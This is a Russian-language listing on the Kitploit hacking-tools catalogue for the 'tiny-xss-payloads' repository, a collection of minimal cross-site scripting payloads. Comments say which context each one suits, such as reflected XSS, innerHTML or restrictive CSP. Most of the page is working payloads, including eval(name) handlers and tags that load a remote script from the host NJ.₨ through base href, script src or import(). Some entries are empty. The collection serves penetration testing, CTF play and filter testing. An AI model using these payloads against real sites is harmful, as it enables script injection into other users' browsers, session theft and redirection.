Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Tiny-XSS-Payloads — Коллекция крошечных XSS Payloads, которые можно использовать в различных контекстах. https://tinyxss.terjanq.me | Kitploit
Инструменты/GitHubGitHub/terjanq/tiny-xss-payloads
Генерация полезной нагрузкиВеб-безопасностьCTFПодобранные Ресурсы
GitHubterjanq/tiny-xss-payloads

Tiny-XSS-Payloads

Коллекция крошечных XSS Payloads, которые можно использовать в различных контекстах. https://tinyxss.terjanq.me

Репозиторий
2.4k21841 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Сайт
Поделиться

Tiny-XSS-Payloads

Коллекция коротких XSS-пейлоадов, которые можно использовать в разных контекстах.

Демо доступно здесь: https://tinyxss.terjanq.me

Текущие пейлоады

root@kitploit:~
<!-- Требуется относительный скрипт, вставленный в DOM после стока,
  например: <base/href=//NJ.₨> ... <script src=/aaa></script> -->
<base/href=//NJ.₨>
root@kitploit:~
<!-- Работает только как отражённый XSS -->
<svg/onload=eval(name)>
root@kitploit:~
<!-- Если вы контролируете URL -->
<svg/onload=eval(`'`+URL)>
root@kitploit:~
<!-- Если вы контролируете имя, но unsafe-eval не включён -->
<svg/onload=location=name>
root@kitploit:~
<!-- В Chrome также работает внутри innerHTML, даже для элементов, ещё не вставленных в DOM -->
<svg><svg/onload=eval(name)>
root@kitploit:~
<!-- Если вы контролируете имя окна, этот пейлоад будет работать внутри innerHTML, даже для элементов, ещё не вставленных в DOM -->
<audio/src/onerror=eval(name)>
root@kitploit:~
<!-- Если вы контролируете URL, этот пейлоад будет работать внутри innerHTML, даже для элементов, ещё не вставленных в DOM -->

root@kitploit:~
<!-- Просто обычный скрипт -->
<script/src=//NJ.₨></script>
root@kitploit:~
<!-- Если вы контролируете имя окна -->

root@kitploit:~
<!-- Если вы контролируете URL -->

root@kitploit:~
<!-- Если количество iframe на странице постоянно -->

root@kitploit:~
<!-- Только для Firefox -->
<script/href=//NJ.₨ />">
root@kitploit:~
<!-- Если количество iframe на странице случайно -->

root@kitploit:~
<!-- Если unsafe-inline отключён в CSP и разрешены внешние скрипты -->
</script>">
root@kitploit:~
<!-- Если встроенные стили разрешены -->
<style/onload=eval(name)>
root@kitploit:~
<!-- Если встроенные стили разрешены и URL можно контролировать -->
<style/onload=eval(`'`+URL)>
root@kitploit:~
<!-- Если встроенные стили заблокированы -->
<style/onerror=eval(name)>
root@kitploit:~
<!-- Использует внешний скрипт как импорт, не работает внутри innerHTML -->
<!-- PoC работает только на https и в Chrome, так как NJ.₨ проверяет заголовок Sec-Fetch-Dest -->
<svg/onload=import(/\\NJ.₨/)>
root@kitploit:~
<!-- Использует внешний скрипт как импорт, срабатывает, если встроенные стили разрешены.
<!-- PoC работает только на https и в Chrome, так как NJ.₨ проверяет заголовок Sec-Fetch-Dest -->
<style/onload=import(/\\NJ.₨/)>
root@kitploit:~
<!-- Использует внешний скрипт как импорт -->
<!-- PoC работает только на https и в Chrome, так как NJ.₨ проверяет заголовок Sec-Fetch-Dest -->

Устаревшие:

root@kitploit:~
<!-- Если вы контролируете URL, только Safari -->

root@kitploit:~
<!-- Если встроенные стили разрешены, только Safari -->
<style/onload=write(URL)>
Скачать инструмент